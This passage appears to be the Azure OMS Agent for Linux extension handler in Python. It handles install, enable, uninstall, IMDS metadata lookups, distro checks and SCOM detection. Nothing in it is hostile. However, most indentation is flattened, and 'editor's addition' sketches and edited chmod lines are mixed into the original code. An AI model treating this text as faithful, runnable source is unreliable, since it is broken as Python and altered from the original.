raise Exception("Failed to verify shell bundle with the SHA256 sums file at " + sha256SumsFilePath)
def main():
"""
Main method
Parse out operation from argument, invoke the operation, and finish.
"""
init_waagent_logger()
waagent_log_info('OmsAgentForLinux started to handle.')
global IsUpgrade
# Determine the operation being executed
operation = None
try:
option = sys.argv[1]
if re.match('^([-/]*)(disable)', option):
operation = 'Disable'
elif re.match('^([-/]*)(uninstall)', option):
operation = 'Uninstall'
elif re.match('^([-/]*)(install)', option):
operation = 'Install'
elif re.match('^([-/]*)(enable)', option):
operation = 'Enable'
elif re.match('^([-/]*)(update)', option):
operation = 'Update'
IsUpgrade = True
elif re.match('^([-/]*)(telemetry)', option):
operation = 'Telemetry'
except Exception as e:
waagent_log_error(str(e))
if operation is None:
log_and_exit('Unknown', 1, 'No valid operation provided')
# Set up for exit code and any error messages
exit_code = 0
message = '{0} succeeded'.format(operation)
# Clean status file to mitigate diskspace issues on small VMs
status_files = [
"/var/opt/microsoft/omsconfig/status/dscperformconsistency",
"/var/opt/microsoft/omsconfig/status/dscperforminventory",
"/var/opt/microsoft/omsconfig/status/dscsetlcm",
"/var/opt/microsoft/omsconfig/status/omsconfighost"
]
for sf in status_files:
if os.path.isfile(sf):
if sf.startswith("/var/opt/microsoft/omsconfig/status"):
try:
os.remove(sf)
except Exception as e:
hutil_log_info('Error removing telemetry status file before installation: {0}'.format(sf))
hutil_log_info('Exception info: {0}'.format(traceback.format_exc()))
exit_code = check_disk_space_availability()
    if exit_code != 0:
message = '{0} failed due to low disk space'.format(operation)
log_and_exit(operation, exit_code, message)
# Invoke operation
try:
global HUtilObject
HUtilObject = parse_context(operation)
# Verify shell bundle signing
try:
hutil_log_info("Start signing verification")
verifyShellBundleSigningAndChecksum()
hutil_log_info("ShellBundle signing verification succeeded")
except Exception as ex:
errmsg = "ShellBundle signing verification failed with '%s'" % ex.message
if ProceedOnSigningVerificationFailure:
hutil_log_error(errmsg)
else:
                log_and_exit(operation, 1, errmsg)
# invoke operation
exit_code, output = operations[operation]()
# Exit code 1 indicates a general problem that doesn't have a more
# specific error code; it often indicates a missing dependency
        if exit_code == 1 and operation == 'Install':
message = 'Install failed with exit code 1. Please check that ' \
'dependencies are installed. For details, check logs ' \
'in /var/log/azure/Microsoft.EnterpriseCloud.' \
'Monitoring.OmsAgentForLinux'
        elif exit_code == 127 and operation == 'Install':
# happens if shell bundle couldn't be extracted due to low space or missing dependency
exit_code = 52 # since it is a missing dependency
message = 'Install failed with exit code 127. Please check that ' \
'dependencies are installed. For details, check logs ' \
'in /var/log/azure/Microsoft.EnterpriseCloud.' \
'Monitoring.OmsAgentForLinux'
        elif exit_code == DPKGLockedErrorCode and operation == 'Install':
message = 'Install failed with exit code {0} because the ' \
'package manager on the VM is currently locked: ' \
'please wait and try again'.format(DPKGLockedErrorCode)
        elif exit_code != 0:
message = '{0} failed with exit code {1} {2}'.format(operation,
exit_code, output)
except OmsAgentForLinuxException as e:
exit_code = e.error_code
message = e.get_error_message(operation)
except Exception as e:
exit_code = 1
message = '{0} failed with error: {1}\n' \
'Stacktrace: {2}'.format(operation, e,
traceback.format_exc())
# Finish up and log messages
log_and_exit(operation, exit_code, message)
def check_disk_space_availability():
"""
Check if there is the required space on the machine.
"""
try:
if get_free_space_mb("/var") < 500 or get_free_space_mb("/etc") < 500 or get_free_space_mb("/opt") < 500:
# 52 is the exit code for missing dependency i.e. disk space
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
return 52
else:
return 0
except:
print('Failed to check disk usage.')
return 0
def get_free_space_mb(dirname):
"""
Get the free space in MB in the directory path.
"""
st = os.statvfs(dirname)
return (st.f_bavail * st.f_frsize) // (1024 * 1024)
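# --- Illustrative sketch (editor's addition): os.statvfs() reports sizes in
# filesystem fragment units, so the bytes available to an unprivileged caller
# are f_bavail * f_frsize. A quick report against the 500 MB thresholds used
# in check_disk_space_availability() above:
def _example_report_free_space():
    for mount in ('/var', '/etc', '/opt'):
        print('{0}: {1} MB free'.format(mount, get_free_space_mb(mount)))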
def stop_telemetry_process():
pids_filepath = os.path.join(os.getcwd(),'omstelemetry.pid')
# kill existing telemetry watcher
if os.path.exists(pids_filepath):
with open(pids_filepath, "r") as f:
for pid in f.readlines():
# Verify the pid actually belongs to omsagent.
cmd_file = os.path.join("/proc", str(pid.strip("\n")), "cmdline")
if os.path.exists(cmd_file):
with open(cmd_file, "r") as pidf:
cmdline = pidf.readlines()
if cmdline[0].find("omsagent.py") >= 0 and cmdline[0].find("-telemetry") >= 0:
kill_cmd = "kill " + pid
run_command_and_log(kill_cmd)
run_command_and_log("rm "+pids_filepath)
def start_telemetry_process():
"""
Start telemetry process that performs periodic monitoring activities
:return: None
"""
stop_telemetry_process()
#start telemetry watcher
omsagent_filepath = os.path.join(os.getcwd(),'omsagent.py')
args = ['python{0}'.format(sys.version_info[0]), omsagent_filepath, '-telemetry']
log = open(os.path.join(os.getcwd(), 'daemon.log'), 'w')
hutil_log_info('start watcher process '+str(args))
subprocess.Popen(args, stdout=log, stderr=log)
def telemetry():
pids_filepath = os.path.join(os.getcwd(), 'omstelemetry.pid')
py_pid = os.getpid()
with open(pids_filepath, 'w') as f:
f.write(str(py_pid) + '\n')
if HUtilObject is not None:
watcher = watcherutil.Watcher(HUtilObject.error, HUtilObject.log)
watcher_thread = Thread(target = watcher.watch)
self_mon_thread = Thread(target = watcher.monitor_health)
watcher_thread.start()
self_mon_thread.start()
watcher_thread.join()
self_mon_thread.join()
return 0, ""
def prepare_update():
"""
Copy / move configuration directory to the backup
"""
# First check if backup directory was previously created for given workspace.
    # If it was created with all the files, we need not move the files again.
public_settings, _ = get_settings()
workspaceId = public_settings.get('workspaceId')
etc_remove_path = os.path.join(EtcOMSAgentPath, workspaceId)
etc_move_path = os.path.join(EtcOMSAgentPath, ExtensionStateSubdirectory, workspaceId)
if (not os.path.isdir(etc_move_path)):
shutil.move(etc_remove_path, etc_move_path)
return 0, ""
def restore_state(workspaceId):
"""
Copy / move state from backup to the expected location.
"""
try:
etc_backup_path = os.path.join(EtcOMSAgentPath, ExtensionStateSubdirectory, workspaceId)
etc_final_path = os.path.join(EtcOMSAgentPath, workspaceId)
if (os.path.isdir(etc_backup_path) and not os.path.isdir(etc_final_path)):
shutil.move(etc_backup_path, etc_final_path)
except Exception as e:
hutil_log_error("Error while restoring the state. Exception : "+traceback.format_exc())
def install():
"""
Ensure that this VM distro and version are supported.
Install the OMSAgent shell bundle, using retries.
Note: install operation times out from WAAgent at 15 minutes, so do not
wait longer.
"""
exit_if_vm_not_supported('Install')
public_settings, protected_settings = get_settings()
if public_settings is None:
raise ParameterMissingException('Public configuration must be ' \
'provided')
workspaceId = public_settings.get('workspaceId')
check_workspace_id(workspaceId)
# Take the backup of the state for given workspace.
restore_state(workspaceId)
# In the case where a SCOM connection is already present, we should not
# create conflicts by installing the OMSAgent packages
stopOnMultipleConnections = public_settings.get('stopOnMultipleConnections')
if (stopOnMultipleConnections is not None
and stopOnMultipleConnections is True):
detect_multiple_connections(workspaceId)
package_directory = os.path.join(os.getcwd(), PackagesDirectory)
bundle_path = os.path.join(package_directory, BundleFileName)
    os.chmod(bundle_path, 0o755)  # make the bundle executable; the original decimal literal 100 (i.e. 0o144) was presumably meant as an octal mode
cmd = InstallCommandTemplate.format(bundle_path)
hutil_log_info('Running command "{0}"'.format(cmd))
# Retry, since install can fail due to concurrent package operations
exit_code, output = run_command_with_retries_output(cmd, retries = 15,
retry_check = retry_if_dpkg_locked_or_curl_is_not_found,
final_check = final_check_if_dpkg_locked)
return exit_code, output
def check_kill_process(pstring):
for line in os.popen("ps ax | grep " + pstring + " | grep -v grep"):
fields = line.split()
pid = fields[0]
os.kill(int(pid), signal.SIGKILL)
def uninstall():
"""
Uninstall the OMSAgent shell bundle.
This is a somewhat soft uninstall. It is not a purge.
Note: uninstall operation times out from WAAgent at 5 minutes
"""
package_directory = os.path.join(os.getcwd(), PackagesDirectory)
bundle_path = os.path.join(package_directory, BundleFileName)
global IsUpgrade
    os.chmod(bundle_path, 0o755)  # make the bundle executable; the original decimal literal 100 (i.e. 0o144) was presumably meant as an octal mode
cmd = UninstallCommandTemplate.format(bundle_path)
hutil_log_info('Running command "{0}"'.format(cmd))
# Retry, since uninstall can fail due to concurrent package operations
try:
exit_code, output = run_command_with_retries_output(cmd, retries = 5,
retry_check = retry_if_dpkg_locked_or_curl_is_not_found,
final_check = final_check_if_dpkg_locked)
except Exception as e:
# try to force clean the installation
try:
check_kill_process("omsagent")
exit_code = 0
except Exception as ex:
exit_code = 1
message = 'Uninstall failed with error: {0}\n' \
'Stacktrace: {1}'.format(ex, traceback.format_exc())
if IsUpgrade:
IsUpgrade = False
else:
remove_workspace_configuration()
return exit_code, output
def enable():
"""
Onboard the OMSAgent to the specified OMS workspace.
This includes enabling the OMS process on the VM.
This call will return non-zero or throw an exception if
the settings provided are incomplete or incorrect.
Note: enable operation times out from WAAgent at 5 minutes
"""
if HUtilObject is not None:
if HUtilObject.is_seq_smaller():
log_output = "Current sequence number {0} is not greater than the sequence number of the most recent executed configuration, skipping enable.".format(HUtilObject._context._seq_no)
hutil_log_info(log_output)
return 0, log_output
exit_if_vm_not_supported('Enable')
public_settings, protected_settings = get_settings()
if public_settings is None:
raise ParameterMissingException('Public configuration must be ' \
'provided')
if protected_settings is None:
raise ParameterMissingException('Private configuration must be ' \
'provided')
vmResourceId = protected_settings.get('vmResourceId')
# If vmResourceId is not provided in private settings, get it from metadata API
if vmResourceId is None or not vmResourceId:
vmResourceId = get_vmresourceid_from_metadata()
hutil_log_info('vmResourceId from Metadata API is {0}'.format(vmResourceId))
if vmResourceId is None:
hutil_log_info('This may be a classic VM')
enableAutomaticManagement = public_settings.get('enableAutomaticManagement')
if (enableAutomaticManagement is not None
and enableAutomaticManagement is True):
hutil_log_info('enableAutomaticManagement is set to true; the ' \
'workspace ID and key will be determined by the OMS ' \
'service.')
workspaceInfo = retrieve_managed_workspace(vmResourceId)
if (workspaceInfo is None or 'WorkspaceId' not in workspaceInfo
or 'WorkspaceKey' not in workspaceInfo):
raise OneClickException('Workspace info was not determined')
else:
# Note: do NOT log workspace keys!
hutil_log_info('Managed workspaceInfo has been retrieved')
workspaceId = workspaceInfo['WorkspaceId']
workspaceKey = workspaceInfo['WorkspaceKey']
try:
check_workspace_id_and_key(workspaceId, workspaceKey)
except InvalidParameterError as e:
raise OMSServiceOneClickException('Received invalid ' \
'workspace info: ' \
'{0}'.format(e))
else:
workspaceId = public_settings.get('workspaceId')
workspaceKey = protected_settings.get('workspaceKey')
check_workspace_id_and_key(workspaceId, workspaceKey)
# Check if omsadmin script is available
if not os.path.exists(OMSAdminPath):
log_and_exit('Enable', EnableCalledBeforeSuccessfulInstall,
'OMSAgent onboarding script {0} does not exist. Enable ' \
'cannot be called before install.'.format(OMSAdminPath))
vmResourceIdParam = '-a {0}'.format(vmResourceId)
proxy = protected_settings.get('proxy')
proxyParam = ''
if proxy is not None:
proxyParam = '-p {0}'.format(proxy)
# get domain from protected settings
domain = protected_settings.get('domain')
if domain is None:
# detect opinsights domain using IMDS
domain = get_azure_cloud_domain()
else:
hutil_log_info("Domain retrieved from protected settings '{0}'".format(domain))
domainParam = ''
if domain:
domainParam = '-d {0}'.format(domain)
optionalParams = '{0} {1} {2}'.format(domainParam, proxyParam, vmResourceIdParam)
onboard_cmd = OnboardCommandWithOptionalParams.format(OMSAdminPath,
workspaceId,
workspaceKey,
optionalParams)
hutil_log_info('Handler initiating onboarding.')
exit_code, output = run_command_with_retries_output(onboard_cmd, retries = 5,
retry_check = retry_onboarding,
final_check = raise_if_no_internet,
check_error = True, log_cmd = False)
# now ensure the permissions and ownership is set recursively
try:
workspaceId = public_settings.get('workspaceId')
etc_final_path = os.path.join(EtcOMSAgentPath, workspaceId)
if (os.path.isdir(etc_final_path)):
uid = pwd.getpwnam(AgentUser).pw_uid
gid = grp.getgrnam(AgentGroup).gr_gid
os.chown(etc_final_path, uid, gid)
os.system('chmod {1} {0}'.format(etc_final_path, 750))
for root, dirs, files in os.walk(etc_final_path):
for d in dirs:
os.chown(os.path.join(root, d), uid, gid)
os.system('chmod {1} {0}'.format(os.path.join(root, d), 750))
for f in files:
os.chown(os.path.join(root, f), uid, gid)
os.system('chmod {1} {0}'.format(os.path.join(root, f), 640))
except:
hutil_log_info('Failed to set permissions for OMS directories, could potentially have issues uploading.')
    if exit_code == 0:
# Create a marker file to denote the workspace that was
# onboarded using the extension. This will allow supporting
# multi-homing through the extension like Windows does
extension_marker_path = os.path.join(EtcOMSAgentPath, workspaceId,
'conf/.azure_extension_marker')
if os.path.exists(extension_marker_path):
hutil_log_info('Extension marker file {0} already ' \
'created'.format(extension_marker_path))
else:
try:
open(extension_marker_path, 'w').close()
hutil_log_info('Created extension marker file ' \
'{0}'.format(extension_marker_path))
except IOError as e:
try:
open(extension_marker_path, 'w+').close()
hutil_log_info('Created extension marker file ' \
'{0}'.format(extension_marker_path))
except IOError as ex:
hutil_log_error('Error creating {0} with error: ' \
'{1}'.format(extension_marker_path, ex))
# we are having some kind of permissions issue creating the marker file
output = "Couldn't create marker file"
exit_code = 52 # since it is a missing dependency
# Sleep to prevent bombarding the processes, then restart all processes
# to resolve any issues with auto-started processes from --upgrade
time.sleep(PostOnboardingSleepSeconds)
run_command_and_log(RestartOMSAgentServiceCommand)
#start telemetry process if enable is successful
start_telemetry_process()
#save sequence number
HUtilObject.save_seq()
return exit_code, output
def remove_workspace_configuration():
"""
    This is needed to distinguish between extension removal and extension upgrade.
    It's a workaround for the waagent upgrade routine calling 'remove' on the old
    version before calling 'upgrade' on the new extension version.
    In the upgrade case the workspace configuration must persist, whereas in the
    remove case all of the files must be removed.
This method will remove all the files/folders from the workspace path in Etc and Var.
"""
public_settings, _ = get_settings()
workspaceId = public_settings.get('workspaceId')
etc_remove_path = os.path.join(EtcOMSAgentPath, workspaceId)
var_remove_path = os.path.join(VarOMSAgentPath, workspaceId)
shutil.rmtree(etc_remove_path, True)
shutil.rmtree(var_remove_path, True)
hutil_log_info('Moved oms etc configuration directory and cleaned up var directory')
def is_arc_installed():
"""
Check if the system is on an Arc machine
"""
# Using systemctl to check this since Arc only supports VMs that have systemd
check_arc = os.system('systemctl status himdsd 1>/dev/null 2>&1')
return check_arc == 0
def get_arc_endpoint():
"""
Find the endpoint for Arc Hybrid IMDS
"""
endpoint_filepath = '/lib/systemd/system.conf.d/azcmagent.conf'
endpoint = ''
try:
with open(endpoint_filepath, 'r') as f:
data = f.read()
endpoint = data.split("\"IMDS_ENDPOINT=")[1].split("\"\n")[0]
except:
hutil_log_error('Unable to load Arc IMDS endpoint from {0}'.format(endpoint_filepath))
return endpoint
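# --- Illustrative sketch (editor's addition): azcmagent.conf embeds the Arc
# IMDS endpoint inside a systemd drop-in line, e.g. a DefaultEnvironment entry
# containing "IMDS_ENDPOINT=http://localhost:40342" (the exact surrounding
# text is an assumption). The split logic above reduces to:
def _example_parse_arc_endpoint(data):
    try:
        return data.split('"IMDS_ENDPOINT=')[1].split('"\n')[0]
    except IndexError:
        return ''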
def get_imds_endpoint():
"""
Find the endpoint for IMDS, whether Arc or not
"""
azure_imds_endpoint = 'http://169.254.169.254/metadata/instance?api-version=2018-10-01'
if (is_arc_installed()):
hutil_log_info('Arc is installed, loading Arc-specific IMDS endpoint')
imds_endpoint = get_arc_endpoint()
if imds_endpoint:
imds_endpoint += '/metadata/instance?api-version=2019-08-15'
else:
# Fall back to the traditional IMDS endpoint; the cloud domain and VM
# resource id detection logic are resilient to failed queries to IMDS
imds_endpoint = azure_imds_endpoint
hutil_log_info('Falling back to default Azure IMDS endpoint')
else:
imds_endpoint = azure_imds_endpoint
hutil_log_info('Using IMDS endpoint "{0}"'.format(imds_endpoint))
return imds_endpoint
def get_vmresourceid_from_metadata():
imds_endpoint = get_imds_endpoint()
req = urllib.request.Request(imds_endpoint)
req.add_header('Metadata', 'True')
try:
response = json.loads(urllib.request.urlopen(req).read())
if ('compute' not in response or response['compute'] is None):
return None # classic vm
if response['compute']['vmScaleSetName']:
return '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.Compute/virtualMachineScaleSets/{2}/virtualMachines/{3}'.format(response['compute']['subscriptionId'],response['compute']['resourceGroupName'],response['compute']['vmScaleSetName'],response['compute']['name'])
else:
return '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.Compute/virtualMachines/{2}'.format(response['compute']['subscriptionId'],response['compute']['resourceGroupName'],response['compute']['name'])
except urllib.error.HTTPError as e:
hutil_log_error('Request to Metadata service URL ' \
'failed with an HTTPError: {0}'.format(e))
hutil_log_info('Response from Metadata service: ' \
'{0}'.format(e.read()))
return None
except:
hutil_log_error('Unexpected error from Metadata service')
return None
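# --- Illustrative sketch (editor's addition): every IMDS query needs the
# 'Metadata: True' header or it is rejected. A minimal standalone fetch of the
# instance document used above:
def _example_query_imds(endpoint):
    req = urllib.request.Request(endpoint)
    req.add_header('Metadata', 'True')
    return json.loads(urllib.request.urlopen(req).read())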
def get_azure_environment_from_imds():
imds_endpoint = get_imds_endpoint()
req = urllib.request.Request(imds_endpoint)
req.add_header('Metadata', 'True')
try:
response = json.loads(urllib.request.urlopen(req).read())
if ('compute' not in response or response['compute'] is None):
return None # classic vm
if ('azEnvironment' not in response['compute'] or response['compute']['azEnvironment'] is None):
return None # classic vm
return response['compute']['azEnvironment']
except urllib.error.HTTPError as e:
hutil_log_error('Request to Metadata service URL ' \
'failed with an HTTPError: {0}'.format(e))
hutil_log_info('Response from Metadata service: ' \
'{0}'.format(e.read()))
return None
except:
hutil_log_error('Unexpected error from Metadata service')
return None
def get_azure_cloud_domain():
try:
environment = get_azure_environment_from_imds()
if environment:
for cloud, domain in CloudDomainMap.items():
if environment.lower() == cloud.lower():
hutil_log_info('Detected cloud environment "{0}" via IMDS. The domain "{1}" will be used.'.format(cloud, domain))
return domain
hutil_log_info('Unknown cloud environment "{0}"'.format(environment))
except Exception as e:
hutil_log_error('Failed to detect cloud environment: {0}'.format(e))
hutil_log_info('Falling back to default domain "{0}"'.format(CloudDomainMap[DefaultCloudName]))
return CloudDomainMap[DefaultCloudName]
def retrieve_managed_workspace(vm_resource_id):
"""
EnableAutomaticManagement has been set to true; the
ManagedIdentity extension and the VM Resource ID are also
required for the OneClick scenario
Using these and the Metadata API, we will call the OMS service
to determine what workspace ID and key to onboard to
"""
# Check for OneClick scenario requirements:
if not os.path.exists(ManagedIdentityExtListeningURLPath):
raise ManagedIdentityExtMissingException
# Determine the Tenant ID using the Metadata API
tenant_id = get_tenant_id_from_metadata_api(vm_resource_id)
# Retrieve an OAuth token using the ManagedIdentity extension
if tenant_id is not None:
hutil_log_info('Tenant ID from Metadata API is {0}'.format(tenant_id))
access_token = get_access_token(tenant_id, OAuthTokenResource)
else:
return None
# Query OMS service for the workspace info for onboarding
if tenant_id is not None and access_token is not None:
return get_workspace_info_from_oms(vm_resource_id, tenant_id,
access_token)
else:
return None
def disable():
"""
Disable all OMS workspace processes on the VM.
Note: disable operation times out from WAAgent at 15 minutes
"""
#stop the telemetry process
stop_telemetry_process()
# Check if the service control script is available
if not os.path.exists(OMSAgentServiceScript):
        log_and_exit('Disable', 1, 'OMSAgent service control script {0} does ' \
'not exist. Disable cannot be called ' \
'before install.'.format(OMSAgentServiceScript))
return 1
exit_code, output = run_command_and_log(DisableOMSAgentServiceCommand)
return exit_code, output
# Dictionary of operations strings to methods
operations = {'Disable' : disable,
'Uninstall' : uninstall,
'Install' : install,
'Enable' : enable,
# For update call we will only prepare the update by taking some backup of the state
# since omsagent.py->install() will be called
# everytime upgrade is done due to upgradeMode =
# "UpgradeWithInstall" set in HandlerManifest
'Update' : prepare_update,
'Telemetry' : telemetry
}
def parse_context(operation):
"""
Initialize a HandlerUtil object for this operation.
If the required modules have not been imported, this will return None.
"""
hutil = None
if ('Utils.WAAgentUtil' in sys.modules
and 'Utils.HandlerUtil' in sys.modules):
try:
logFileName = 'extension.log'
if (operation == 'Telemetry'):
logFileName = 'watcher.log'
hutil = HUtil.HandlerUtility(waagent.Log, waagent.Error, logFileName=logFileName)
hutil.do_parse_context(operation)
# parse_context may throw KeyError if necessary JSON key is not
# present in settings
except KeyError as e:
waagent_log_error('Unable to parse context with error: ' \
'{0}'.format(e))
raise ParameterMissingException
return hutil
def is_vm_supported_for_extension():
"""
Checks if the VM this extension is running on is supported by OMSAgent
Returns for platform.linux_distribution() vary widely in format, such as
'7.3.1611' returned for a VM with CentOS 7, so the first provided
digits must match
The supported distros of the OMSAgent-for-Linux are allowed to utilize
this VM extension. All other distros will get error code 51
"""
supported_dists = {'redhat' : ['6', '7', '8'], 'red hat' : ['6', '7', '8'], 'rhel' : ['6', '7', '8'], # Red Hat
'centos' : ['6', '7', '8'], # CentOS
'oracle' : ['6', '7', '8'], 'ol': ['6', '7', '8'], # Oracle
'debian' : ['8', '9'], # Debian
'ubuntu' : ['14.04', '16.04', '18.04', '20.04'], # Ubuntu
'suse' : ['12', '15'], 'sles' : ['12', '15'], # SLES
'amzn' : ['2'] # AWS
}
vm_dist, vm_ver, vm_supported = '', '', False
try:
vm_dist, vm_ver, vm_id = platform.linux_distribution()
except AttributeError:
try:
vm_dist, vm_ver, vm_id = platform.dist()
except AttributeError:
hutil_log_info("Falling back to /etc/os-release distribution parsing")
# Fallback if either of the above fail; on some (especially newer)
# distros, linux_distribution() and dist() are unreliable or deprecated
if not vm_dist and not vm_ver:
try:
with open('/etc/os-release', 'r') as fp:
for line in fp:
if line.startswith('ID='):
vm_dist = line.split('=')[1]
vm_dist = vm_dist.split('-')[0]
vm_dist = vm_dist.replace('\"', '').replace('\n', '')
elif line.startswith('VERSION_ID='):
vm_ver = line.split('=')[1]
vm_ver = vm_ver.replace('\"', '').replace('\n', '')
except:
return vm_supported, 'Indeterminate operating system', ''
# Find this VM distribution in the supported list
for supported_dist in list(supported_dists.keys()):
if not vm_dist.lower().startswith(supported_dist):
continue
# Check if this VM distribution version is supported
vm_ver_split = vm_ver.split('.')
for supported_ver in supported_dists[supported_dist]:
supported_ver_split = supported_ver.split('.')
# If vm_ver is at least as precise (at least as many digits) as
# supported_ver and matches all the supported_ver digits, then
# this VM is guaranteed to be supported
vm_ver_match = True
for idx, supported_ver_num in enumerate(supported_ver_split):
try:
supported_ver_num = int(supported_ver_num)
vm_ver_num = int(vm_ver_split[idx])
except IndexError:
vm_ver_match = False
break
                if vm_ver_num != supported_ver_num:
vm_ver_match = False
break
if vm_ver_match:
vm_supported = True
break
if vm_supported:
break
return vm_supported, vm_dist, vm_ver
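# --- Illustrative sketch (editor's addition): the version test above is a
# digit-by-digit prefix match; a VM version is supported when it has at least
# as many numeric components as the supported entry and matches all of them
# ('7.3.1611' matches '7', '16.04.2' matches '16.04'). The same rule in
# isolation:
def _example_version_matches(vm_ver, supported_ver):
    vm_parts = vm_ver.split('.')
    for idx, supported_num in enumerate(supported_ver.split('.')):
        try:
            if int(vm_parts[idx]) != int(supported_num):
                return False
        except (IndexError, ValueError):
            return False
    return True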
def exit_if_vm_not_supported(operation):
"""
Check if this VM distro and version are supported by the OMSAgent.
If this VM is not supported, log the proper error code and exit.
"""
vm_supported, vm_dist, vm_ver = is_vm_supported_for_extension()
if not vm_supported:
log_and_exit(operation, UnsupportedOperatingSystem, 'Unsupported operating system: ' \
'{0} {1}'.format(vm_dist, vm_ver))
return 0
def exit_if_openssl_unavailable(operation):
"""
Check if the openssl commandline interface is available to use
If not, throw error to return UnsupportedOpenSSL error code
"""
exit_code, output = run_get_output('which openssl', True, False)
    if exit_code != 0:
log_and_exit(operation, UnsupportedOpenSSL, 'OpenSSL is not available')
return 0
def check_workspace_id_and_key(workspace_id, workspace_key):
"""
Validate formats of workspace_id and workspace_key
"""
check_workspace_id(workspace_id)
# Validate that workspace_key is of the correct format (base64-encoded)
if workspace_key is None:
raise ParameterMissingException('Workspace key must be provided')
try:
encoded_key = base64.b64encode(base64.b64decode(workspace_key))
if sys.version_info >= (3,): # in python 3, base64.b64encode will return bytes, so decode to str for comparison
encoded_key = encoded_key.decode()
if encoded_key != workspace_key:
raise InvalidParameterError('Workspace key is invalid')
except TypeError:
raise InvalidParameterError('Workspace key is invalid')
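# --- Illustrative sketch (editor's addition): the key check above is a
# decode/re-encode round trip; a string is valid standard base64 exactly when
# b64encode(b64decode(s)) reproduces it.
def _example_is_valid_base64(value):
    try:
        encoded = base64.b64encode(base64.b64decode(value))
        if sys.version_info >= (3,):
            encoded = encoded.decode()
        return encoded == value
    except (TypeError, ValueError):
        return False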
def check_workspace_id(workspace_id):
"""
Validate that workspace_id matches the GUID regex
"""
if workspace_id is None:
raise ParameterMissingException('Workspace ID must be provided')
search = re.compile(GUIDOnlyRegex, re.M)
if not search.match(workspace_id):
raise InvalidParameterError('Workspace ID is invalid')
def detect_multiple_connections(workspace_id):
"""
If the VM already has a workspace/SCOM configured, then we should
disallow a new connection when stopOnMultipleConnections is used
Throw an exception in these cases:
- The workspace with the given workspace_id has not been onboarded
to the VM, but at least one other workspace has been
- The workspace with the given workspace_id has not been onboarded
to the VM, and the VM is connected to SCOM
If the extension operation is connecting to an already-configured
workspace, it is not a stopping case
"""
other_connection_exists = False
if os.path.exists(OMSAdminPath):
exit_code, utfoutput = run_get_output(WorkspaceCheckCommand,
chk_err = False)
        # output may contain unicode characters not supported by ascii;
        # e.g., without conversion this raises: UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 18: ordinal not in range(128)
        # the default encoding in python < 3 is ascii
if sys.version_info < (3,):
output = utfoutput.decode('utf8').encode('utf8')
else:
output = utfoutput
if output.strip().lower() != 'no workspace':
for line in output.split('\n'):
if workspace_id in line:
hutil_log_info('The workspace to be enabled has already ' \
'been configured on the VM before; ' \
'continuing despite ' \
'stopOnMultipleConnections flag')
return
else:
# Note: if scom workspace dir is created, a line containing
# "Workspace(SCOM Workspace): scom" will be here
# If any other line is here, it may start sending data later
other_connection_exists = True
else:
for dir_name, sub_dirs, files in os.walk(EtcOMSAgentPath):
for sub_dir in sub_dirs:
sub_dir_name = os.path.basename(sub_dir)
workspace_search = re.compile(GUIDOnlyRegex, re.M)
if sub_dir_name == workspace_id:
hutil_log_info('The workspace to be enabled has already ' \
'been configured on the VM before; ' \
'continuing despite ' \
'stopOnMultipleConnections flag')
return
elif (workspace_search.match(sub_dir_name)
or sub_dir_name == 'scom'):
other_connection_exists = True
if other_connection_exists:
        err_msg = ('This machine is already connected to another Log ' \
                   'Analytics workspace. Please set ' \
                   'stopOnMultipleConnections to false in public ' \
                   'settings, or remove the property, so that this ' \
                   'machine can connect to additional workspaces; note ' \
                   'that the machine will then be billed once for each ' \
                   'workspace it reports to. ' \
                   '(LINUXOMSAGENTEXTENSION_ERROR_MULTIPLECONNECTIONS)')
# This exception will get caught by the main method
raise UnwantedMultipleConnectionsException(err_msg)
else:
detect_scom_connection()
def detect_scom_connection():
"""
    If the following two conditions are met, we assume the VM is
    monitored by SCOM:
    1. SCOMPort is open and omiserver is listening on it
    2. The scx certificate is signed by the SCOM server
    To check these conditions:
    1. SCOMPort is open and omiserver is listening on it:
       /etc/opt/omi/conf/omiserver.conf can be parsed to
       determine this.
    2. The scx certificate is signed by the SCOM server: the SCOM
       cert is present at /etc/opt/omi/ssl/omi-host-<hostname>.pem
       (/etc/opt/microsoft/scx/ssl/scx.pem is a softlink to this).
       If the VM is monitored by SCOM, the issuer field of the
       certificate will have a value like
       CN=SCX-Certificate/title=<GUID>, DC=<SCOM server hostname>
       (e.g. CN=SCX-Certificate/title=SCX94a1f46d-2ced-4739-9b6a-1f06156ca4ac,
       DC=NEB-OM-1502733)
    Otherwise, if a scom configuration directory has been created,
    we assume SCOM is in use
"""
scom_port_open = None # return when determine this is false
cert_signed_by_scom = False
if os.path.exists(OMSAdminPath):
scom_port_open = detect_scom_using_omsadmin()
if scom_port_open is False:
return
# If omsadmin.sh option is not available, use omiconfigeditor
if (scom_port_open is None and os.path.exists(OMIConfigEditorPath)
and os.path.exists(OMIServerConfPath)):
scom_port_open = detect_scom_using_omiconfigeditor()
if scom_port_open is False:
return
# If omiconfigeditor option is not available, directly parse omiserver.conf
if scom_port_open is None and os.path.exists(OMIServerConfPath):
scom_port_open = detect_scom_using_omiserver_conf()
if scom_port_open is False:
return
if scom_port_open is None:
hutil_log_info('SCOM port could not be determined to be open')
return
# Parse the certificate to determine if SCOM issued it
if os.path.exists(SCOMCertPath):
exit_if_openssl_unavailable('Install')
cert_cmd = 'openssl x509 -in {0} -noout -text'.format(SCOMCertPath)
cert_exit_code, cert_output = run_get_output(cert_cmd, chk_err = False,
log_cmd = False)
        if cert_exit_code == 0:
issuer_re = re.compile(SCOMCertIssuerRegex, re.M)
if issuer_re.search(cert_output):
hutil_log_info('SCOM cert exists and is signed by SCOM server')
cert_signed_by_scom = True
else:
hutil_log_info('SCOM cert exists but is not signed by SCOM ' \
'server')
else:
hutil_log_error('Error reading SCOM cert; cert could not be ' \
'determined to be signed by SCOM server')
else:
hutil_log_info('SCOM cert does not exist')
if scom_port_open and cert_signed_by_scom:
err_msg = ('This machine may already be connected to a System ' \
'Center Operations Manager server. Please set ' \
'stopOnMultipleConnections to false in public settings ' \
'or remove this property to allow connection to the Log ' \
'Analytics workspace. ' \
'(LINUXOMSAGENTEXTENSION_ERROR_MULTIPLECONNECTIONS)')
raise UnwantedMultipleConnectionsException(err_msg)
def detect_scom_using_omsadmin():
"""
This method assumes that OMSAdminPath exists; if packages have not
been installed yet, this may not exist
Returns True if omsadmin.sh indicates that SCOM port is open
"""
omsadmin_cmd = '{0} -o'.format(OMSAdminPath)
exit_code, output = run_get_output(omsadmin_cmd, False, False)
